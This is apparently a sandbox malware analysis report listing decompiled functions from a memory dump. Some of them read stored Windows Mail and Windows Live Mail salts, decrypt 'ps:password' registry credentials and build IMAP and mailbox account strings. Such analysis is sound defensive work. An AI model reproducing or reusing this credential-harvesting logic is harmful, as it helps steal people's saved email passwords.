                                                                                              				void _v771;
                                                                                              				char _v772;
                                                                                              				void _v1027;
                                                                                              				char _v1028;
                                                                                              				char _v1284;
                                                                                              				char _v2308;
                                                                                              				char _t47;
                                                                                              				intOrPtr* _t50;
                                                                                              				void* _t57;
                                                                                              				intOrPtr* _t73;
                                                                                              				void* _t76;
                                                                                              				void* _t77;
                                                                                              				void* _t78;
                                                                                              				void* _t79;
                                                                                              
                                                                                              				_v1028 = 0;
                                                                                              				memset( &_v1027, 0, 0xfe);
                                                                                              				_v772 = 0;
                                                                                              				memset( &_v771, 0, 0xfe);
                                                                                              				_v516 = 0;
                                                                                              				memset( &_v515, 0, 0xfe);
                                                                                              				_t77 = _t76 + 0x24;
                                                                                              				if(_a16 != 0xffffffff) {
                                                                                              					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F071(_a16,  &_v1284));
                                                                                              					_t77 = _t77 + 0x14;
                                                                                              				}
                                                                                              				if(_a20 != 0xffffffff) {
                                                                                              					sprintf( &_v772, "<font color=\"%s\">", E0040F071(_a20,  &_v1284));
                                                                                              					strcpy( &_v516, "</font>");
                                                                                              					_t77 = _t77 + 0x1c;
                                                                                              				}
                                                                                              				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
                                                                                              				E00405EFD(_a4,  &_v2308);
                                                                                              				_t47 = _a12;
                                                                                              				_t78 = _t77 + 0x14;
                                                                                              				if(_t47 > 0) {
                                                                                              					_t73 = _a8 + 4;
                                                                                              					_a16 = _t47;
                                                                                              					do {
                                                                                              						_v260 = 0;
                                                                                              						memset( &_v259, 0, 0xfe);
                                                                                              						_t50 =  *_t73;
                                                                                              						_t79 = _t78 + 0xc;
                                                                                              						if( *_t50 == 0) {
                                                                                              							_v260 = 0;
                                                                                              						} else {
                                                                                              							sprintf( &_v260, " width=\"%s\"", _t50);
                                                                                              							_t79 = _t79 + 0xc;
                                                                                              						}
                                                                                              						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
                                                                                              						_t57 = E00405EFD(_a4,  &_v2308);
                                                                                              						_t78 = _t79 + 0x20;
                                                                                              						_t73 = _t73 + 8;
                                                                                              						_t34 =  &_a16;
                                                                                              						 *_t34 = _a16 - 1;
                                                                                              					} while ( *_t34 != 0);
                                                                                              					return _t57;
                                                                                              				}
                                                                                              				return _t47;
                                                                                              			}


                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: sprintf$memset$strcpy
                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                              • API String ID: 898937289-3842416460
                                                                                              • Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                              • Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
                                                                                              • Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                                              • Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040E0DA() {
                                                                                              				void* _t1;
                                                                                              				int _t2;
                                                                                              				struct HINSTANCE__* _t4;
                                                                                              
                                                                                              				if( *0x417518 != 0) {
                                                                                              					return _t1;
                                                                                              				}
                                                                                              				_t2 = LoadLibraryA("psapi.dll");
                                                                                              				_t4 = _t2;
                                                                                              				if(_t4 == 0) {
                                                                                              					L10:
                                                                                              					return _t2;
                                                                                              				} else {
                                                                                              					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
                                                                                              					 *0x416fec = _t2;
                                                                                              					if(_t2 != 0) {
                                                                                              						_t2 = GetProcAddress(_t4, "EnumProcessModules");
                                                                                              						 *0x416fe4 = _t2;
                                                                                              						if(_t2 != 0) {
                                                                                              							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
                                                                                              							 *0x416fdc = _t2;
                                                                                              							if(_t2 != 0) {
                                                                                              								_t2 = GetProcAddress(_t4, "EnumProcesses");
                                                                                              								 *0x41710c = _t2;
                                                                                              								if(_t2 != 0) {
                                                                                              									_t2 = GetProcAddress(_t4, "GetModuleInformation");
                                                                                              									 *0x416fe8 = _t2;
                                                                                              									if(_t2 != 0) {
                                                                                              										 *0x417518 = 1;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					if( *0x417518 == 0) {
                                                                                              						_t2 = FreeLibrary(_t4);
                                                                                              					}
                                                                                              					goto L10;
                                                                                              				}
                                                                                              			}


                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0040E16A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                              • API String ID: 2449869053-232097475
                                                                                              • Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                              • Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
                                                                                              • Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                                              • Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 84%
                                                                                              			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				char _v6;
                                                                                              				char _v7;
                                                                                              				char _v8;
                                                                                              				int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				void* _v20;
                                                                                              				short* _v24;
                                                                                              				unsigned int _v28;
                                                                                              				char* _v32;
                                                                                              				int _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				signed int _v44;
                                                                                              				void _v299;
                                                                                              				char _v300;
                                                                                              				void _v555;
                                                                                              				char _v556;
                                                                                              				char _v1080;
                                                                                              				void* __esi;
                                                                                              				int _t56;
                                                                                              				intOrPtr _t58;
                                                                                              				intOrPtr _t64;
                                                                                              				char _t92;
                                                                                              				char* _t93;
                                                                                              				void* _t100;
                                                                                              				signed int _t102;
                                                                                              				signed int _t107;
                                                                                              				intOrPtr _t108;
                                                                                              				void* _t113;
                                                                                              
                                                                                              				_t113 = __eflags;
                                                                                              				_t100 = __edx;
                                                                                              				_t93 = __eax;
                                                                                              				E004046D7( &_v1080);
                                                                                              				if(E004047A0( &_v1080, _t113) != 0) {
                                                                                              					_t56 = strlen(_t93);
                                                                                              					asm("cdq");
                                                                                              					_t107 = _t56 - _t100 >> 1;
                                                                                              					_t2 = _t107 + 1; // 0x1
                                                                                              					_t58 = _t2;
                                                                                              					L004115D0();
                                                                                              					_t102 = 0;
                                                                                              					_t96 = _t58;
                                                                                              					_v16 = _t58;
                                                                                              					if(_t107 > 0) {
                                                                                              						do {
                                                                                              							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
                                                                                              							_v7 = _t93[1 + _t102 * 2];
                                                                                              							_v6 = 0;
                                                                                              							_t92 = E00406512( &_v8);
                                                                                              							_t96 = _v16;
                                                                                              							 *((char*)(_t102 + _v16)) = _t92;
                                                                                              							_t102 = _t102 + 1;
                                                                                              						} while (_t102 < _t107);
                                                                                              					}
                                                                                              					_v556 = 0;
                                                                                              					memset( &_v555, 0, 0xff);
                                                                                              					_v12 = 0;
                                                                                              					_v300 = 0;
                                                                                              					memset( &_v299, 0, 0xfe);
                                                                                              					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
                                                                                              					if(_t64 != 1) {
                                                                                              						__eflags = _t64 - 2;
                                                                                              						if(_t64 == 2) {
                                                                                              							_push("Software\\Microsoft\\Windows Live Mail");
                                                                                              							goto L7;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_push("Software\\Microsoft\\Windows Mail");
                                                                                              						L7:
                                                                                              						strcpy( &_v300, ??);
                                                                                              						_pop(_t96);
                                                                                              					}
                                                                                              					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
                                                                                              						_v12 = 0xff;
                                                                                              						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
                                                                                              						RegCloseKey(_v20);
                                                                                              					}
                                                                                              					_v40 = _v16;
                                                                                              					_v36 = _v12;
                                                                                              					_v32 =  &_v556;
                                                                                              					_v44 = _t107;
                                                                                              					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
                                                                                              						_t108 = _a8;
                                                                                              						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
                                                                                              						(_t108 + 0x400)[_v28 >> 1] = 0;
                                                                                              						LocalFree(_v24);
                                                                                              					}
                                                                                              					_push(_v16);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				return E004047F1( &_v1080);
                                                                                              			}


                                                                                              APIs
                                                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                              • strlen.MSVCRT ref: 0041054C
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0041055C
                                                                                              • memset.MSVCRT ref: 004105A8
                                                                                              • memset.MSVCRT ref: 004105C5
                                                                                              • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00410637
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
                                                                                              • LocalFree.KERNEL32(?), ref: 0041069D
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004106A6
                                                                                                • Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004105E7
                                                                                              • Software\Microsoft\Windows Mail, xrefs: 004105DB
                                                                                              • Salt, xrefs: 00410621
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                              • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                              • API String ID: 1673043434-2687544566
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E0040CBA7(intOrPtr __ecx, intOrPtr _a4) {
                                                                                              				intOrPtr _v8;
                                                                                              				void _v619;
                                                                                              				char _v620;
                                                                                              				void _v1231;
                                                                                              				char _v1232;
                                                                                              				void* __edi;
                                                                                              				void* _t37;
                                                                                              				void* _t53;
                                                                                              				char* _t54;
                                                                                              				intOrPtr _t60;
                                                                                              				void* _t61;
                                                                                              				char* _t62;
                                                                                              				void* _t67;
                                                                                              				intOrPtr _t84;
                                                                                              				void* _t85;
                                                                                              				intOrPtr _t87;
                                                                                              				void* _t88;
                                                                                              				void* _t89;
                                                                                              
                                                                                              				_t87 = _a4;
                                                                                              				_t84 = __ecx;
                                                                                              				_v8 = __ecx;
                                                                                              				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
                                                                                              					_t37 = 0;
                                                                                              				} else {
                                                                                              					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                              				}
                                                                                              				_push(0xa);
                                                                                              				_push("mailbox://");
                                                                                              				_push(_t37);
                                                                                              				L00411612();
                                                                                              				_t89 = _t88 + 0xc;
                                                                                              				if(_t37 == 0) {
                                                                                              					L8:
                                                                                              					_a4 = 0;
                                                                                              					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
                                                                                              						while(1) {
                                                                                              							_t85 = E0040D438(_a4, _t84 + 0x468);
                                                                                              							_v620 = 0;
                                                                                              							memset( &_v619, 0, 0x261);
                                                                                              							_v1232 = 0;
                                                                                              							memset( &_v1231, 0, 0x261);
                                                                                              							_t17 = _t85 + 0x104; // 0x104
                                                                                              							_t18 = _t85 + 0x204; // 0x204
                                                                                              							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
                                                                                              							_t20 = _t85 + 0x104; // 0x104
                                                                                              							_t21 = _t85 + 0x204; // 0x204
                                                                                              							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
                                                                                              							_t53 = 0;
                                                                                              							_t89 = _t89 + 0x38;
                                                                                              							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
                                                                                              								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                              							}
                                                                                              							_push(_t53);
                                                                                              							_t54 =  &_v620;
                                                                                              							_push(_t54);
                                                                                              							L004115B2();
                                                                                              							if(_t54 == 0) {
                                                                                              								goto L17;
                                                                                              							}
                                                                                              							_t61 = 0;
                                                                                              							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
                                                                                              								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                              							}
                                                                                              							_push(_t61);
                                                                                              							_t62 =  &_v1232;
                                                                                              							_push(_t62);
                                                                                              							L004115B2();
                                                                                              							if(_t62 != 0) {
                                                                                              								L18:
                                                                                              								_a4 = _a4 + 1;
                                                                                              								_t60 = _v8;
                                                                                              								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
                                                                                              									_t84 = _t60;
                                                                                              									continue;
                                                                                              								} else {
                                                                                              								}
                                                                                              							} else {
                                                                                              								goto L17;
                                                                                              							}
                                                                                              							goto L21;
                                                                                              							L17:
                                                                                              							if( *((char*)(E00406B0F( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
                                                                                              								E00401380(_t57 + 1, _t85 + 0x304, 0xff);
                                                                                              							} else {
                                                                                              								goto L18;
                                                                                              							}
                                                                                              							goto L21;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
                                                                                              						_t67 = 0;
                                                                                              					} else {
                                                                                              						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                              					}
                                                                                              					_push(7);
                                                                                              					_push("imap://");
                                                                                              					_push(_t67);
                                                                                              					L00411612();
                                                                                              					_t89 = _t89 + 0xc;
                                                                                              					if(_t67 == 0) {
                                                                                              						goto L8;
                                                                                              					}
                                                                                              				}
                                                                                              				L21:
                                                                                              				return 1;
                                                                                              			}






















                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                                                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                              • API String ID: 4281260487-2229823034
                                                                                              • Opcode ID: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                                                              • Instruction ID: 9e102a0fb77db954c7e66e430d6901f6f24083c0ab16dd7aca32eaa7b9d40139
                                                                                              • Opcode Fuzzy Hash: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                                                              • Instruction Fuzzy Hash: B84163B1604205EFD724DB69C881F96B7E8AF04344F144A7BEA4AE7281D738FA448B58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E0040CBA5(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
                                                                                              				intOrPtr _v8;
                                                                                              				void _v619;
                                                                                              				char _v620;
                                                                                              				void _v1231;
                                                                                              				char _v1232;
                                                                                              				void* __edi;
                                                                                              				void* _t39;
                                                                                              				void* _t55;
                                                                                              				char* _t56;
                                                                                              				intOrPtr _t62;
                                                                                              				void* _t63;
                                                                                              				char* _t64;
                                                                                              				void* _t69;
                                                                                              				intOrPtr _t89;
                                                                                              				void* _t91;
                                                                                              				intOrPtr _t94;
                                                                                              				void* _t99;
                                                                                              				void* _t100;
                                                                                              				void* _t101;
                                                                                              
                                                                                              				_t100 = _t99 - 0x4cc;
                                                                                              				_t94 = _a4;
                                                                                              				_t89 = __ecx;
                                                                                              				_v8 = __ecx;
                                                                                              				if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
                                                                                              					_t39 = 0;
                                                                                              				} else {
                                                                                              					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                                                              				}
                                                                                              				_push(0xa);
                                                                                              				_push("mailbox://");
                                                                                              				_push(_t39);
                                                                                              				L00411612();
                                                                                              				_t101 = _t100 + 0xc;
                                                                                              				if(_t39 == 0) {
                                                                                              					L9:
                                                                                              					_a4 = 0;
                                                                                              					if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
                                                                                              						while(1) {
                                                                                              							_t91 = E0040D438(_a4, _t89 + 0x468);
                                                                                              							_v620 = 0;
                                                                                              							memset( &_v619, 0, 0x261);
                                                                                              							_v1232 = 0;
                                                                                              							memset( &_v1231, 0, 0x261);
                                                                                              							_t17 = _t91 + 0x104; // 0x104
                                                                                              							_t18 = _t91 + 0x204; // 0x204
                                                                                              							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
                                                                                              							_t20 = _t91 + 0x104; // 0x104
                                                                                              							_t21 = _t91 + 0x204; // 0x204
                                                                                              							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
                                                                                              							_t55 = 0;
                                                                                              							_t101 = _t101 + 0x38;
                                                                                              							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
                                                                                              								_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                                                              							}
                                                                                              							_push(_t55);
                                                                                              							_t56 =  &_v620;
                                                                                              							_push(_t56);
                                                                                              							L004115B2();
                                                                                              							if(_t56 == 0) {
                                                                                              								goto L18;
                                                                                              							}
                                                                                              							_t63 = 0;
                                                                                              							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
                                                                                              								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                                                              							}
                                                                                              							_push(_t63);
                                                                                              							_t64 =  &_v1232;
                                                                                              							_push(_t64);
                                                                                              							L004115B2();
                                                                                              							if(_t64 != 0) {
                                                                                              								L19:
                                                                                              								_a4 = _a4 + 1;
                                                                                              								_t62 = _v8;
                                                                                              								if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
                                                                                              									_t89 = _t62;
                                                                                              									continue;
                                                                                              								} else {
                                                                                              								}
                                                                                              							} else {
                                                                                              								goto L18;
                                                                                              							}
                                                                                              							goto L22;
                                                                                              							L18:
                                                                                              							if( *((char*)(E00406B0F( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
                                                                                              								E00401380(_t59 + 1, _t91 + 0x304, 0xff);
                                                                                              							} else {
                                                                                              								goto L19;
                                                                                              							}
                                                                                              							goto L22;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
                                                                                              						_t69 = 0;
                                                                                              					} else {
                                                                                              						_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                                                              					}
                                                                                              					_push(7);
                                                                                              					_push("imap://");
                                                                                              					_push(_t69);
                                                                                              					L00411612();
                                                                                              					_t101 = _t101 + 0xc;
                                                                                              					if(_t69 == 0) {
                                                                                              						goto L9;
                                                                                              					}
                                                                                              				}
                                                                                              				L22:
                                                                                              				return 1;
                                                                                              			}























                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _stricmp_strnicmpmemsetsprintf
                                                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                              • API String ID: 2822975062-2229823034
                                                                                              • Opcode ID: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                              • Instruction ID: 56d5f4bbafa72d85e66e322173295d9522024af121689b7315c9fa9ceefdefbd
                                                                                              • Opcode Fuzzy Hash: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                                                              • Instruction Fuzzy Hash: 754150B1604605EFD724DB69C8C1F96B7E8AF04304F14466BEA4AE7281D738FA45CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 56%
                                                                                              			E0040D6FB(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
                                                                                              				int _v8;
                                                                                              				int _v12;
                                                                                              				void* _v16;
                                                                                              				short* _v20;
                                                                                              				int _v24;
                                                                                              				char* _v28;
                                                                                              				char _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				char _v40;
                                                                                              				int _v44;
                                                                                              				void _v299;
                                                                                              				char _v300;
                                                                                              				char _v556;
                                                                                              				char _v812;
                                                                                              				char _v4908;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				long _t46;
                                                                                              				int* _t84;
                                                                                              				char* _t85;
                                                                                              
                                                                                              				E004118A0(0x132c, __ecx);
                                                                                              				_t84 = 0;
                                                                                              				_t46 = RegOpenKeyExA(_a16, "Creds", 0, 0x20019,  &_a16);
                                                                                              				if(_t46 != 0) {
                                                                                              					return _t46;
                                                                                              				}
                                                                                              				_v300 = _t46;
                                                                                              				memset( &_v299, 0, 0xff);
                                                                                              				_push(0xff);
                                                                                              				_push( &_v300);
                                                                                              				_v8 = 0;
                                                                                              				_push(0);
                                                                                              				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
                                                                                              					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
                                                                                              						_v12 = 0x1000;
                                                                                              						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
                                                                                              							_v32 = _v12;
                                                                                              							_v28 =  &_v4908;
                                                                                              							_v40 = _a12;
                                                                                              							_v36 = _a8;
                                                                                              							if(E00404811(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
                                                                                              								_t85 =  &_v812;
                                                                                              								_v812 = 0;
                                                                                              								_v556 = 0;
                                                                                              								E004060D0(0xff, _t85,  &_v300);
                                                                                              								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
                                                                                              								 *((intOrPtr*)( *_a4))(_t85);
                                                                                              								LocalFree(_v20);
                                                                                              								_t84 = 0;
                                                                                              							}
                                                                                              						}
                                                                                              						RegCloseKey(_v16);
                                                                                              					}
                                                                                              					_v8 = _v8 + 1;
                                                                                              					_push(0xff);
                                                                                              					_push( &_v300);
                                                                                              					_push(_v8);
                                                                                              				}
                                                                                              				return RegCloseKey(_a16);
                                                                                              			}























                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                              • memset.MSVCRT ref: 0040D743
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
                                                                                              • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
                                                                                              • LocalFree.KERNEL32(?), ref: 0040D825
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040D830
                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                              • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                              • API String ID: 551151806-1288872324
                                                                                              • Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                              • Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
                                                                                              • Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                                              • Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 56%
                                                                                              			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                              				void _v4103;
                                                                                              				char _v4104;
                                                                                              				char _t30;
                                                                                              				struct HMENU__* _t32;
                                                                                              				char _t39;
                                                                                              				void* _t42;
                                                                                              				struct HWND__* _t43;
                                                                                              				struct HMENU__* _t48;
                                                                                              
                                                                                              				_t42 = __edi;
                                                                                              				_t38 = __ecx;
                                                                                              				E004118A0(0x1004, __ecx);
                                                                                              				_t55 = _a8 - 4;
                                                                                              				if(_a8 != 4) {
                                                                                              					__eflags = _a8 - 5;
                                                                                              					if(_a8 == 5) {
                                                                                              						_t39 =  *0x417488;
                                                                                              						__eflags = _t39;
                                                                                              						if(_t39 == 0) {
                                                                                              							L8:
                                                                                              							_push(_t42);
                                                                                              							sprintf(0x4172c0, "dialog_%d", _a12);
                                                                                              							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0);
                                                                                              							_v4104 = 0;
                                                                                              							memset( &_v4103, 0, 0x1000);
                                                                                              							GetWindowTextA(_t43,  &_v4104, 0x1000);
                                                                                              							__eflags = _v4104;
                                                                                              							if(__eflags != 0) {
                                                                                              								E00407E55(__eflags, "caption",  &_v4104);
                                                                                              							}
                                                                                              							EnumChildWindows(_t43, E00407FEB, 0);
                                                                                              							DestroyWindow(_t43);
                                                                                              						} else {
                                                                                              							while(1) {
                                                                                              								_t30 =  *_t39;
                                                                                              								__eflags = _t30;
                                                                                              								if(_t30 == 0) {
                                                                                              									goto L8;
                                                                                              								}
                                                                                              								__eflags = _t30 - _a12;
                                                                                              								if(_t30 != _a12) {
                                                                                              									_t39 = _t39 + 4;
                                                                                              									__eflags = _t39;
                                                                                              									continue;
                                                                                              								}
                                                                                              								goto L11;
                                                                                              							}
                                                                                              							goto L8;
                                                                                              						}
                                                                                              						L11:
                                                                                              					}
                                                                                              				} else {
                                                                                              					sprintf(0x4172c0, "menu_%d", _a12);
                                                                                              					_t32 = LoadMenuA(_a4, _a12);
                                                                                              					 *0x4171b4 =  *0x4171b4 & 0x00000000;
                                                                                              					_t48 = _t32;
                                                                                              					_push(1);
                                                                                              					_push(_t48);
